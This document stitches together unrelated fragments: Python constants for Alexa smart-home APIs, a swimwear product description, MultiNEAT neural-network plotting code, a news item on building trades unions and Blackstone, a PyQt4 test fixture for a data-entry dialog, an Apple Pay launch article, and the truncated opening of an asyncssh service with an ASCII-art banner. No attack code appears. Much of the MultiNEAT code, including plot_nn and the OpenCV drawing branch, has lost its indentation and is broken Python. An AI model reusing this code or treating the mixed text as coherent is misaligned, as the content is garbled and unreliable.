    # Indicates that the event was caused by the application of a device rule.
    # For example, a customer configures a rule to switch on a light if a
    # motion sensor detects motion. In this case, Alexa receives an event from
    # the motion sensor, and another event from the light to indicate that its
    # state change was caused by the rule.
    RULE_TRIGGER = "RULE_TRIGGER"
    # Indicates that the event was caused by a voice interaction with Alexa.
    # For example a user speaking to their Echo device.
    VOICE_INTERACTION = "VOICE_INTERACTION"
class Catalog:
    """The Global Alexa catalog.

    Asset identifiers referencing Alexa's built-in, localized friendly names.
    https://developer.amazon.com/docs/device-apis/resources-and-assets.html#global-alexa-catalog
    You can use the global Alexa catalog for pre-defined names of devices, settings, values, and units.
    This catalog is localized into all the languages that Alexa supports.
    You can reference the following catalog of pre-defined friendly names.
    Each item in the following list is an asset identifier followed by its supported friendly names.
    The first friendly name for each identifier is the one displayed in the Alexa mobile app.
    """
    # Resource label types: reference a catalog asset vs. free-form text.
    LABEL_ASSET = "asset"
    LABEL_TEXT = "text"
    # Device name assets.
    # Shower
    DEVICENAME_SHOWER = "Alexa.DeviceName.Shower"
    # Washer, Washing Machine
    DEVICENAME_WASHER = "Alexa.DeviceName.Washer"
    # Router, Internet Router, Network Router, Wifi Router, Net Router
    DEVICENAME_ROUTER = "Alexa.DeviceName.Router"
    # Fan, Blower
    DEVICENAME_FAN = "Alexa.DeviceName.Fan"
    # Air Purifier, Air Cleaner,Clean Air Machine
    DEVICENAME_AIRPURIFIER = "Alexa.DeviceName.AirPurifier"
    # Space Heater, Portable Heater
    DEVICENAME_SPACEHEATER = "Alexa.DeviceName.SpaceHeater"
    # Shower component assets.
    # Rain Head, Overhead shower, Rain Shower, Rain Spout, Rain Faucet
    SHOWER_RAINHEAD = "Alexa.Shower.RainHead"
    # Handheld Shower, Shower Wand, Hand Shower
    SHOWER_HANDHELD = "Alexa.Shower.HandHeld"
    # Setting name assets.
    # Water Temperature, Water Temp, Water Heat
    SETTING_WATERTEMPERATURE = "Alexa.Setting.WaterTemperature"
    # Temperature, Temp
    SETTING_TEMPERATURE = "Alexa.Setting.Temperature"
    # Wash Cycle, Wash Preset, Wash setting
    SETTING_WASHCYCLE = "Alexa.Setting.WashCycle"
    # 2.4G Guest Wi-Fi, 2.4G Guest Network, Guest Network 2.4G, 2G Guest Wifi
    SETTING_2GGUESTWIFI = "Alexa.Setting.2GGuestWiFi"
    # 5G Guest Wi-Fi, 5G Guest Network, Guest Network 5G, 5G Guest Wifi
    SETTING_5GGUESTWIFI = "Alexa.Setting.5GGuestWiFi"
    # Guest Wi-fi, Guest Network, Guest Net
    SETTING_GUESTWIFI = "Alexa.Setting.GuestWiFi"
    # Auto, Automatic, Automatic Mode, Auto Mode
    SETTING_AUTO = "Alexa.Setting.Auto"
    # #Night, Night Mode
    SETTING_NIGHT = "Alexa.Setting.Night"
    # Quiet, Quiet Mode, Noiseless, Silent
    SETTING_QUIET = "Alexa.Setting.Quiet"
    # Oscillate, Swivel, Oscillation, Spin, Back and forth
    SETTING_OSCILLATE = "Alexa.Setting.Oscillate"
    # Fan Speed, Airflow speed, Wind Speed, Air speed, Air velocity
    SETTING_FANSPEED = "Alexa.Setting.FanSpeed"
    # Preset, Setting
    SETTING_PRESET = "Alexa.Setting.Preset"
    # Mode
    SETTING_MODE = "Alexa.Setting.Mode"
    # Direction
    SETTING_DIRECTION = "Alexa.Setting.Direction"
    # Setting value assets.
    # Delicates, Delicate
    VALUE_DELICATE = "Alexa.Value.Delicate"
    # Quick Wash, Fast Wash, Wash Quickly, Speed Wash
    VALUE_QUICKWASH = "Alexa.Value.QuickWash"
    # Maximum, Max
    VALUE_MAXIMUM = "Alexa.Value.Maximum"
    # Minimum, Min
    VALUE_MINIMUM = "Alexa.Value.Minimum"
    # High
    VALUE_HIGH = "Alexa.Value.High"
    # Low
    VALUE_LOW = "Alexa.Value.Low"
    # Medium, Mid
    VALUE_MEDIUM = "Alexa.Value.Medium"
class Unit:
    """Alexa Units of Measure.

    Identifiers used in capability property schemas (e.g. RangeController).
    https://developer.amazon.com/docs/device-apis/alexa-property-schemas.html#units-of-measure
    """
    ANGLE_DEGREES = "Alexa.Unit.Angle.Degrees"
    ANGLE_RADIANS = "Alexa.Unit.Angle.Radians"
    DISTANCE_FEET = "Alexa.Unit.Distance.Feet"
    DISTANCE_INCHES = "Alexa.Unit.Distance.Inches"
    DISTANCE_KILOMETERS = "Alexa.Unit.Distance.Kilometers"
    DISTANCE_METERS = "Alexa.Unit.Distance.Meters"
    DISTANCE_MILES = "Alexa.Unit.Distance.Miles"
    DISTANCE_YARDS = "Alexa.Unit.Distance.Yards"
    MASS_GRAMS = "Alexa.Unit.Mass.Grams"
    MASS_KILOGRAMS = "Alexa.Unit.Mass.Kilograms"
    PERCENT = "Alexa.Unit.Percent"
    TEMPERATURE_CELSIUS = "Alexa.Unit.Temperature.Celsius"
    TEMPERATURE_DEGREES = "Alexa.Unit.Temperature.Degrees"
    TEMPERATURE_FAHRENHEIT = "Alexa.Unit.Temperature.Fahrenheit"
    TEMPERATURE_KELVIN = "Alexa.Unit.Temperature.Kelvin"
    VOLUME_CUBICFEET = "Alexa.Unit.Volume.CubicFeet"
    VOLUME_CUBICMETERS = "Alexa.Unit.Volume.CubicMeters"
    VOLUME_GALLONS = "Alexa.Unit.Volume.Gallons"
    VOLUME_LITERS = "Alexa.Unit.Volume.Liters"
    VOLUME_PINTS = "Alexa.Unit.Volume.Pints"
    VOLUME_QUARTS = "Alexa.Unit.Volume.Quarts"
    WEIGHT_OUNCES = "Alexa.Unit.Weight.Ounces"
    WEIGHT_POUNDS = "Alexa.Unit.Weight.Pounds"
class Inputs:
    """Valid names for the InputController.

    Maps normalized (lowercase, no-space) source names onto the input names
    Alexa recognizes.
    https://developer.amazon.com/docs/device-apis/alexa-property-schemas.html#input
    """
    VALID_SOURCE_NAME_MAP = {
        "aux": "AUX 1",
        "aux1": "AUX 1",
        "aux2": "AUX 2",
        "aux3": "AUX 3",
        "aux4": "AUX 4",
        "aux5": "AUX 5",
        "aux6": "AUX 6",
        "aux7": "AUX 7",
        "bluray": "BLURAY",
        "cable": "CABLE",
        "cd": "CD",
        "coax": "COAX 1",
        "coax1": "COAX 1",
        "coax2": "COAX 2",
        "composite": "COMPOSITE 1",
        "composite1": "COMPOSITE 1",
        "dvd": "DVD",
        "game": "GAME",
        "gameconsole": "GAME",
        "hdradio": "HD RADIO",
        "hdmi": "HDMI 1",
        "hdmi1": "HDMI 1",
        "hdmi2": "HDMI 2",
        "hdmi3": "HDMI 3",
        "hdmi4": "HDMI 4",
        "hdmi5": "HDMI 5",
        "hdmi6": "HDMI 6",
        "hdmi7": "HDMI 7",
        "hdmi8": "HDMI 8",
        "hdmi9": "HDMI 9",
        "hdmi10": "HDMI 10",
        "hdmiarc": "HDMI ARC",
        "input": "INPUT 1",
        "input1": "INPUT 1",
        "input2": "INPUT 2",
        "input3": "INPUT 3",
        "input4": "INPUT 4",
        "input5": "INPUT 5",
        "input6": "INPUT 6",
        "input7": "INPUT 7",
        "input8": "INPUT 8",
        "input9": "INPUT 9",
        "input10": "INPUT 10",
        "ipod": "IPOD",
        "line": "LINE 1",
        "line1": "LINE 1",
        "line2": "LINE 2",
        "line3": "LINE 3",
        "line4": "LINE 4",
        "line5": "LINE 5",
        "line6": "LINE 6",
        "line7": "LINE 7",
        "mediaplayer": "MEDIA PLAYER",
        "optical": "OPTICAL 1",
        "optical1": "OPTICAL 1",
        "optical2": "OPTICAL 2",
        "phono": "PHONO",
        "playstation": "PLAYSTATION",
        "playstation3": "PLAYSTATION 3",
        "playstation4": "PLAYSTATION 4",
        "satellite": "SATELLITE",
        "satellitetv": "SATELLITE",
        "smartcast": "SMARTCAST",
        "tuner": "TUNER",
        "tv": "TV",
        "usbdac": "USB DAC",
        "video": "VIDEO 1",
        "video1": "VIDEO 1",
        "video2": "VIDEO 2",
        "video3": "VIDEO 3",
        "xbox": "XBOX",
    }
|
New arrival Fresh Happy Girl Bikini Set With Front Bow Strappy Hipster. Fantastic print design. Inspired by the tropics. From the front it is a classic halterneck. Turn around and you have three spaghetti straps running from the neck to the back strap.
|
from _MultiNEAT import *
def Scale(a, a_min, a_max, a_tr_min, a_tr_max):
    """Linearly map *a* from [a_min, a_max] onto [a_tr_min, a_tr_max].

    When the source interval is degenerate (a_min == a_max) the source
    endpoint a_max is returned unchanged, mirroring the historical
    behaviour of this helper.
    """
    src_range = a_max - a_min
    if src_range == 0:
        return a_max
    fraction = (a - a_min) / src_range
    return a_tr_min + (a_tr_max - a_tr_min) * fraction
def Clamp(a, min, max):
    """Limit *a* to the closed interval [min, max].

    NOTE: the parameter names shadow the built-ins; kept for API
    compatibility with existing callers.
    """
    if a > max:
        return max
    if a < min:
        return min
    return a
def AlmostEqual(a, b, margin):
    """Return True when the absolute difference of *a* and *b* does not
    exceed *margin* (inclusive)."""
    return abs(a - b) <= margin
# Optional OpenCV/NumPy support for fast raster rendering.
try:
    import cv2
    import numpy as np
    from numpy import array, clip
    cvnumpy_installed = True
except ImportError:
    # Narrowed from a bare ``except``: only a missing module means "not
    # installed"; any other import-time failure should surface as a bug.
    print ('Tip: install the OpenCV computer vision library (2.0+) with '
           'Python bindings')
    print ('    to get convenient neural network visualization to NumPy '
           'arrays')
    cvnumpy_installed = False
# Optional matplotlib support for axes-based rendering.
try:
    import matplotlib.pyplot as plt
    matplotlib_installed = True
except ImportError:
    # Narrowed from a bare ``except``: only a missing module means
    # "not installed".
    matplotlib_installed = False
if matplotlib_installed:
    def render_nn(nn, ax=None,
                  is_substrate=False,
                  details=False,
                  invert_yaxis=True,
                  connection_alpha=1.0):
        """Draw the phenotype network *nn* onto a matplotlib axes.

        Args:
            nn: a NeuralNetwork phenotype; neurons must carry x/y (or
                substrate_coords when *is_substrate* is True).
            ax: target axes; defaults to ``plt.gca()``.
            is_substrate: use substrate coordinates and wider limits.
            details: accepted for API compatibility (currently unused).
            invert_yaxis: flip the y axis so depth grows downwards.
            connection_alpha: global alpha multiplier for connections.
        """
        if ax is None:
            ax = plt.gca()
        if is_substrate:
            ax.set_xlim(-1.1, 1.1)
            ax.set_ylim(-1.1, 1.1)
            node_radius = 0.05
        else:
            ax.set_xlim(-0.05, 1.05)
            ax.set_ylim(-0.05, 1.05)
            node_radius = 0.03
        if invert_yaxis: ax.invert_yaxis()
        # Largest |weight|, used to normalise connection alpha.
        # FIX: the original took max() of the *signed* weights, which
        # crashed on an empty connection list and produced a negative
        # divisor (invisible arrows) when every weight was negative.
        max_weight = max((abs(c.weight) for c in nn.connections),
                         default=1.0) or 1.0
        # connections
        for connection in nn.connections:
            n1 = nn.neurons[connection.source_neuron_idx]
            n2 = nn.neurons[connection.target_neuron_idx]
            if is_substrate:
                n1_x, n1_y = n1.substrate_coords[0], n1.substrate_coords[1]
                n2_x, n2_y = n2.substrate_coords[0], n2.substrate_coords[1]
            else:
                n1_x, n1_y = n1.x, n1.y
                n2_x, n2_y = n2.x, n2.y
            offsetx = n2_x - n1_x
            offsety = n2_y - n1_y
            # Axis-aligned connections are skipped (preserved behaviour).
            if offsetx == 0 or offsety == 0:
                continue
            # if going left->right, offset is a bit to the left and vice versa
            # same for y
            if n1_x - offsetx < 0:
                ox = -node_radius * 0.9
            elif n1_x - offsetx > 0:
                ox = node_radius * 0.9
            else:
                ox = 0
            if n1_y - offsety < 0:
                oy = -node_radius * 0.9
            elif n1_y - offsety > 0:
                oy = node_radius * 0.9
            else:
                oy = 0
            # Line width tracks the weight, clipped to a sane range.
            wg = clip(connection.weight, -2, 2)
            # Excitatory connections are red, inhibitory blue.
            color = 'red' if connection.weight > 0.0 else 'blue'
            ax.arrow(n1_x, n1_y, offsetx + ox, offsety + oy,
                     head_width=node_radius * 0.8,
                     head_length=node_radius * 1.2,
                     fc=color, ec=color, length_includes_head=True,
                     linewidth=abs(wg),
                     alpha=connection_alpha * np.clip(
                         0.1 + abs(connection.weight) / max_weight, 0, 1))
        # neurons
        for index in range(len(nn.neurons)):
            n = nn.neurons[index]
            if is_substrate:
                nx, ny = n.substrate_coords[0], n.substrate_coords[1]
            else:
                nx, ny = n.x, n.y
            # Fill colour encodes activation (blue-ish negative,
            # red-ish positive, grey at zero).
            a = n.activation
            if a < 0:
                clr = array([0.3, 0.3, 0.3]) + array([0, 0, 0.5]) * (-a)
            else:
                clr = array([0.3, 0.3, 0.3]) + array([0.5, 0, 0]) * (a)
            clr = clip(clr, 0, 1)
            # Edge colour encodes the neuron's role.
            if n.type == NeuronType.INPUT:
                ax.add_patch(plt.Circle((nx, ny), node_radius, ec='green',
                                        fc=clr, linewidth=3, zorder=2))
            elif n.type == NeuronType.BIAS:
                ax.add_patch(plt.Circle((nx, ny), node_radius, ec='black',
                                        fc=(1, 1, 1), linewidth=3, zorder=2))
            elif n.type == NeuronType.HIDDEN:
                ax.add_patch(plt.Circle((nx, ny), node_radius, ec='grey',
                                        fc=clr, linewidth=3, zorder=2))
            elif n.type == NeuronType.OUTPUT:
                ax.add_patch(plt.Circle((nx, ny), node_radius, ec='brown',
                                        fc=clr, linewidth=3, zorder=2))
def plot_nn(nn, ax=None,
is_substrate=False,
details=False,
invert_yaxis=True,
connection_alpha=1.0):
# if this is a genome, make a NN from it
if type(nn) == Genome:
kk = NeuralNetwork()
nn.BuildPhenotype(kk)
nn = kk
if is_substrate:
return render_nn(nn, ax,
is_substrate=True,
details=details,
invert_yaxis=invert_yaxis)
# not a substrate, compute the node coordinates
for i, n in enumerate(nn.neurons):
nn.neurons[i].x = 0
nn.neurons[i].y = 0
rect_x = 0
rect_y = 0
rect_x_size = 1
rect_y_size = 1
neuron_radius = 0.03
MAX_DEPTH = 64
# for every depth, count how many nodes are on this depth
all_depths = np.linspace(0.0, 1.0, MAX_DEPTH)
for depth in all_depths:
neuron_count = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron_count += 1
if neuron_count == 0:
continue
# calculate x positions of neurons
xxpos = rect_x_size / (1 + neuron_count)
j = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron.x = rect_x + xxpos + j * (rect_x_size / (2 + neuron_count))
j = j + 1
# calculate y positions of nodes
for neuron in nn.neurons:
base_y = rect_y + neuron.split_y
size_y = rect_y_size - neuron_radius
if neuron.split_y == 0.0:
neuron.y = base_y * size_y + neuron_radius
else:
neuron.y = base_y * size_y
# done, render the nn
return render_nn(nn, ax,
is_substrate=False,
details=details,
invert_yaxis=invert_yaxis)
# Faster Neural Network display code
# image is a NumPy array
# rect is a tuple in the form (x, y, size_x, size_y)
if not cvnumpy_installed:
    def DrawPhenotype(image, rect, nn, neuron_radius=15,
                      max_line_thickness=3, substrate=False):
        """Stub installed when OpenCV/NumPy are missing; always raises."""
        # Carry the explanation in the exception instead of printing it,
        # so callers that catch or log the error still see the reason.
        raise NotImplementedError("OpenCV/NumPy don't appear to be installed")
else:
MAX_DEPTH = 64
def DrawPhenotype(image, rect, nn, neuron_radius=15,
max_line_thickness=3, substrate=False):
for i, n in enumerate(nn.neurons):
nn.neurons[i].x = 0
nn.neurons[i].y = 0
rect_x = rect[0]
rect_y = rect[1]
rect_x_size = rect[2]
rect_y_size = rect[3]
if not substrate:
depth = 0
# for every depth, count how many nodes are on this depth
all_depths = np.linspace(0.0, 1.0, MAX_DEPTH)
for depth in all_depths:
neuron_count = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron_count += 1
if neuron_count == 0:
continue
# calculate x positions of neurons
xxpos = rect_x_size / (1 + neuron_count)
j = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron.x = rect_x + xxpos + j * (rect_x_size / (2 + neuron_count))
j = j + 1
# calculate y positions of nodes
for neuron in nn.neurons:
base_y = rect_y + neuron.split_y
size_y = rect_y_size - neuron_radius
if neuron.split_y == 0.0:
neuron.y = base_y * size_y + neuron_radius
else:
neuron.y = base_y * size_y
else:
# HyperNEAT substrate
# only the first 2 dimensions are used for drawing
# if a layer is 1D, y values will be supplied to make 3 rows
# determine min/max coords in NN
xs = [(neuron.substrate_coords[0]) for neuron in nn.neurons]
ys = [(neuron.substrate_coords[1]) for neuron in nn.neurons]
min_x, min_y, max_x, max_y = min(xs), min(ys), max(xs), max(ys)
#dims = [len(neuron.substrate_coords) for neuron in nn.neurons]
for neuron in nn.neurons:
# TODO(jkoelker) Make the rect_x_size / 15 a variable
neuron.x = Scale(neuron.substrate_coords[0], min_x, max_x,
rect_x_size / 15,
rect_x_size - rect_x_size / 15)
neuron.y = Scale(neuron.substrate_coords[1], min_y, max_y,
rect_x_size / 15,
rect_y_size - rect_x_size / 15)
# the positions of neurons is computed, now we draw
# connections first
if len(nn.connections) > 0:
max_weight = max([abs(x.weight) for x in nn.connections])
else:
max_weight = 1.0
if image.dtype in [np.uint8, np.uint16, np.uint32, np.uint,
np.int, np.int8, np.int16, np.int32]:
magn = 255.0
else:
magn = 1.0
for conn in nn.connections:
thickness = conn.weight
thickness = Scale(thickness, 0, max_weight, 1, max_line_thickness)
thickness = Clamp(thickness, 1, max_line_thickness)
w = Scale(abs(conn.weight), 0.0, max_weight, 0.0, 1.0)
w = Clamp(w, 0.75, 1.0)
if conn.recur_flag:
if conn.weight < 0:
# green weight
color = (0, magn * w, 0)
else:
# white weight
color = (magn * w, magn * w, magn * w)
else:
if conn.weight < 0:
# blue weight
color = (0, 0, magn * w)
else:
# red weight
color = (magn * w, 0, 0)
if magn == 255:
color = tuple(int(x) for x in color)
# if the link is looping back on the same neuron, draw it with
# ellipse
if conn.source_neuron_idx == conn.target_neuron_idx:
pass # todo: later
else:
# Draw a line
pt1 = (int(nn.neurons[conn.source_neuron_idx].x),
int(nn.neurons[conn.source_neuron_idx].y))
pt2 = (int(nn.neurons[conn.target_neuron_idx].x),
int(nn.neurons[conn.target_neuron_idx].y))
cv2.line(image, pt1, pt2, color, int(thickness))
# draw all neurons
for neuron in nn.neurons:
pt = (int(neuron.x), int(neuron.y))
a = neuron.activation
if a < 0:
clr = array([0.3,0.3,0.3]) + array([0, 0, .7]) * (-a)
else:
clr = array([0.3,0.3,0.3]) + array([.7, .7, .7]) * (a)
clr = clip(clr, 0, 1)
if image.dtype in [np.uint8, np.uint16, np.uint32, np.uint,
np.int, np.int8, np.int16, np.int32]:
clr = (clr*255).astype(np.uint8)
clr = tuple(int(x) for x in clr)
a = Clamp(a, 0.3, 2.0)
if neuron.type == NeuronType.INPUT:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled
cv2.circle(image, pt, neuron_radius, (0,255,0), thickness=2) # outline
elif neuron.type == NeuronType.BIAS:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled
cv2.circle(image, pt, neuron_radius, (0,0,0), thickness=2) # outline
elif neuron.type == NeuronType.HIDDEN:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled
cv2.circle(image, pt, neuron_radius, (127,127,127), thickness=2) # outline
elif neuron.type == NeuronType.OUTPUT:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled first
cv2.circle(image, pt, neuron_radius, (255,255,0), thickness=2) # outline
|
North America's Building Trades Unions (NABTU) says its members are "ready, willing and able" to assist with post-Hurricane Harvey cleanup and rebuilding efforts in Texas and Louisiana.
"Whenever a major natural or man-made disaster has struck the United States — including Hurricane Katrina, Superstorm Sandy, and the attacks on 9/11 — the men and women of [NABTU] have always responded in earnest, and we intend to do the same with regard to the tragedy that continues to unfold in Texas and Louisiana," the organization said in a statement. "Our members and our unions bring a unique and much-needed skillset to these types of situations, where a safe, highly trained and highly skilled construction craft workforce is invaluable to clean-up and re-building efforts.
"Further," NABTU added, "as residents and whole communities begin the arduous process of re-building homes, buildings and critical infrastructure, our apprenticeship-readiness and formal apprenticeship education and training system has proven to be an asset not only in ensuring that enough skilled craft professionals are available to do this work, but also to provide life-altering career training opportunities for local residents."
On a brighter note, NABTU and Blackstone on Sept. 5 announced a new agreement whereby the investment firm would adopt a Responsible Contractor Policy. Under the policy, Blackstone will cooperate with NABTU to include "responsible contractors" — i.e., those contractors who meet a set of criteria that promotes fair benefits, wages, working conditions and training opportunities — in the bidding and selection process for investments in the firm's dedicated infrastructure business. Earlier this year Blackstone announced a $20 billion commitment by Saudi Arabia to that sector of its business.
"Rebuilding our country's aging infrastructure will create badly needed jobs with good wages and benefits for construction workers throughout the United States," said Sean Klimczak, Senior Managing Director and Global Head of Blackstone's Infrastructure business. "At Blackstone, we have a strong track record of responsible engagement with workers, their labor union representatives, and the communities in which we invest. We are proud to partner with the NABTU in this effort because we believe a fairly compensated and well-trained workforce is critical to producing high-quality infrastructure projects that help drive local economic growth."
Sean McGarvey, President of the NABTU, added: "We are proud to partner with Blackstone on ensuring good jobs and pathways for disadvantaged communities in the launch of their dedicated infrastructure business. This agreement creates opportunities for our members and contractors, while strengthening job training for women, veterans and communities of color."
|
#!/usr/bin/env python
import pytest
import pytestqt
from PyQt4 import QtGui
from collections import OrderedDict
import sys,os
from Views import ui_dialog_obs as obs
from poplerGUI import ui_logic_preview as prev
from poplerGUI import class_modelviewpandas as view
from poplerGUI import class_inputhandler as ini
from poplerGUI.logiclayer import class_userfacade as face
from poplerGUI.logiclayer import class_helpers as hlp
# Resolve the repository root (two directory levels above this test file),
# make its parent importable, and chdir there so relative data paths used
# by the fixtures resolve correctly.
rootpath = os.path.dirname(os.path.dirname( __file__ ))
end = os.path.sep  # platform-specific path separator shorthand
sys.path.append(os.path.realpath(os.path.dirname(
    rootpath)))
os.chdir(rootpath)
@pytest.fixture
def ObsDialog(site_handle_free, file_handle_free, meta_handle_free):
    """Pytest fixture: a fully wired observation-table dialog.

    Builds a Qt dialog backed by a Facade that has already verified the
    metadata handle, loaded the data file, and registered the distinct
    site levels found in the study-site column.
    """
    class ObsDialog(QtGui.QDialog, obs.Ui_Dialog):
        def __init__(self, parent=None):
            super().__init__(parent)
            self.setupUi(self)
            # Facade set up for the taxa dialog
            # box. These inputs will have been already
            # logged in the computer in order to
            # reach this phase
            self.facade = face.Facade()
            self.facade.input_register(meta_handle_free)
            self.facade.meta_verify()
            self.facade.input_register(file_handle_free)
            self.facade.load_data()
            self.facade.input_register(site_handle_free)
            # Distinct site identifiers from the study-site column.
            sitelevels = self.facade._data[
                site_handle_free.lnedentry['study_site_key']].drop_duplicates().values.tolist()
            self.facade.register_site_levels(sitelevels)
            # Place holders for user inputs
            self.obslned = {}
            self.obsckbox = {}
            self.obsraw = {}
            self.available = None
            self.null = None
            # Place holder: Data Model/ Data model view
            self.obsmodel = None
            self.viewEdit = view.PandasTableModelEdit
            # Placeholders: Data tables
            self.obstable = None
            # Placeholder: Director (table builder), log
            self.obsdirector = None
            self._log = None
            # Placeholder for maindata Orms
            self.obsorms = {}
            # Actions
            # Both Preview and Save&Close route to submit_change; the
            # sender() is inspected there to tell them apart.
            self.btnPreview.clicked.connect(self.submit_change)
            self.btnSaveClose.clicked.connect(self.submit_change)
            self.btnCancel.clicked.connect(self.close)
            self.tablename = None
            self.table = None
            # Update boxes/preview box
            self.message = QtGui.QMessageBox
            self.error = QtGui.QErrorMessage()
            self.preview = prev.TablePreview()

        def submit_change(self):
            """Collect widget state, build the raw observation table, and
            either preview it or register it for pushing, depending on
            which button triggered the call."""
            sender = self.sender()
            # Line-edit values keyed by their database column name.
            self.obslned = OrderedDict((
                ('spatial_replication_level_2', self.lnedRep2.text()),
                ('spatial_replication_level_3', self.lnedRep3.text()),
                ('spatial_replication_level_4', self.lnedRep4.text()),
                ('spatial_replication_level_5', self.lnedRep5.text()),
                ('structure_type_1', self.lnedStructure1.text()),
                ('structure_type_2', self.lnedStructure2.text()),
                ('structure_type_3', self.lnedStructure3.text()),
                ('structure_type_4', self.lnedStructure4.text()),
                ('treatment_type_1', self.lnedTreatment1.text()),
                ('treatment_type_2', self.lnedTreatment2.text()),
                ('treatment_type_3', self.lnedTreatment3.text()),
                ('unitobs', self.lnedRaw.text())
            ))
            # Checkbox state mirrors obslned; 'unitobs' is always on.
            self.obsckbox = OrderedDict((
                ('spatial_replication_level_2', self.ckRep2.isChecked()),
                ('spatial_replication_level_3', self.ckRep3.isChecked()),
                ('spatial_replication_level_4', self.ckRep4.isChecked()),
                ('spatial_replication_level_5', self.ckRep5.isChecked()),
                ('structure_type_1', self.ckStructure1.isChecked()),
                ('structure_type_2', self.ckStructure2.isChecked()),
                ('structure_type_3', self.ckStructure3.isChecked()),
                ('structure_type_4', self.ckStructure4.isChecked()),
                ('treatment_type_1', self.ckTreatment1.isChecked()),
                ('treatment_type_2', self.ckTreatment2.isChecked()),
                ('treatment_type_3', self.ckTreatment3.isChecked()),
                ('unitobs', True)
            ))
            # Radio buttons select which table type the data goes into.
            self.table = {
                'count_table': self.rbtnCount.isChecked(),
                'biomass_table': self.rbtnBiomass.isChecked(),
                'density_table': self.rbtnDensity.isChecked(),
                'percent_cover_table': self.rbtnPercentcover.isChecked(),
                'individual_table': self.rbtnIndividual.isChecked()
            }
            # Column names whose checkbox is ticked.
            available = [
                x for x,y in zip(
                    list(self.obslned.keys()), list(
                        self.obsckbox.values()))
                if y is True
            ]
            try:
                self.tablename = [
                    x for x, y in
                    zip(list(self.table.keys()), list(self.table.values()))
                    if y is True
                ][0]
            except Exception as e:
                print(str(e))
                # NOTE(review): execution continues with tablename=None
                # after this error is shown — confirm whether an early
                # return was intended here.
                self.error.showMessage('Select data type')
            rawini = ini.InputHandler(
                name='rawinfo',
                tablename= self.tablename,
                lnedentry= hlp.extract(self.obslned, available),
                checks=self.obsckbox)
            self.facade.input_register(rawini)
            self.facade.create_log_record(self.tablename)
            self._log = self.facade._tablelog[self.tablename]
            try:
                self.rawdirector = self.facade.make_table('rawinfo')
                print('obs table build: ', self.rawdirector)
                assert self.rawdirector._availdf is not None
            except Exception as e:
                print(str(e))
                self._log.debug(str(e))
                self.error.showMessage(
                    'Column(s) not identified')
                raise AttributeError(
                    'Column(s) not identified: ' + str(e))
            self.obstable = self.rawdirector._availdf.copy()
            self.obsmodel = self.viewEdit(
                self.obstable)
            # Preview shows the model; Save&Close registers the table
            # for pushing and logs the column mapping.
            if sender is self.btnPreview:
                self.preview.tabviewPreview.setModel(self.obsmodel)
                self.preview.show()
            elif sender is self.btnSaveClose:
                self.facade.push_tables[self.tablename] = self.obstable
                hlp.write_column_to_log(
                    self.obslned, self._log, self.tablename)
                self.close()
    return ObsDialog()
def test_dialog_site(qtbot, ObsDialog):
    """Display the observation dialog and pause for manual interaction."""
    qtbot.addWidget(ObsDialog)
    ObsDialog.show()
    qtbot.stopForInteraction()
|
Apple Pay – The new mobile wallet function, which is expected to become available today (20 October), allows consumers to load details of their different credit and debit cards onto their mobile device and then use it to pay for purchases both in person and online.
All they have to do is either tap the merchant app that they have already loaded onto their phone to process an online payment, or they can tap the phone against a card machine to pay at the till in store.
MasterCard, Visa and American Express were already involved by the time of the announcement, as were many of the biggest US banks. MasterCard is still working on signing up more institutions. But many smaller banks and lenders were apparently caught by surprise, and a substantial number have since rushed to catch up with the trend.
That said, getting the banks involved is one half of the problem. Merchant adoption is the other, and that’s where the system is currently a little less popular.
Big brands from McDonald’s and Macy’s to Texaco have all said they plan to accept Apple Pay, but the number of merchants signing up remains lower than it is for other forms of payment – even considering the popularity of contactless payments in general.
Whether it will encourage more mobile users to make purchases using their smartphones, or whether it will make Apple devices even more attractive to its loyal fans, remains to be seen. However, it looks as though Apple Pay is definitely heading in the right direction.
|
# Copyright (c) Paul R. Tagliamonte <tag@pault.ag>, 2015
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import hashlib
import asyncio
import asyncssh
from moxie.facts import get_printable_fact
from aiocore import Service
MOTD = """
.,-:;//;:=,\r
. :H@@@MM@M#H/.,+%;,\r
,/X+ +M@@M@MM%=,-%HMMM@X/,\r
-+@MM; $M@@MH+-,;XMMMM@MMMM@+-\r
;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.\r
,%MM@@MH ,@%= .---=-=:=,.\r
=@#@@@MX.,\r
=-./@M@M$ ▗ ▌ ▗ ▐ ▗▀▖\r
X@/ -$MM/ ▛▚▀▖▞▀▖▚▗▘▄ ▞▀▖ ▞▀▘▞▀▘▛▀▖ ▄ ▛▀▖▜▀ ▞▀▖▙▀▖▐ ▝▀▖▞▀▖▞▀▖\r
,@M@H: :@: ▌▐ ▌▌ ▌▗▚ ▐ ▛▀ ▝▀▖▝▀▖▌ ▌ ▐ ▌ ▌▐ ▖▛▀ ▌ ▜▀ ▞▀▌▌ ▖▛▀\r
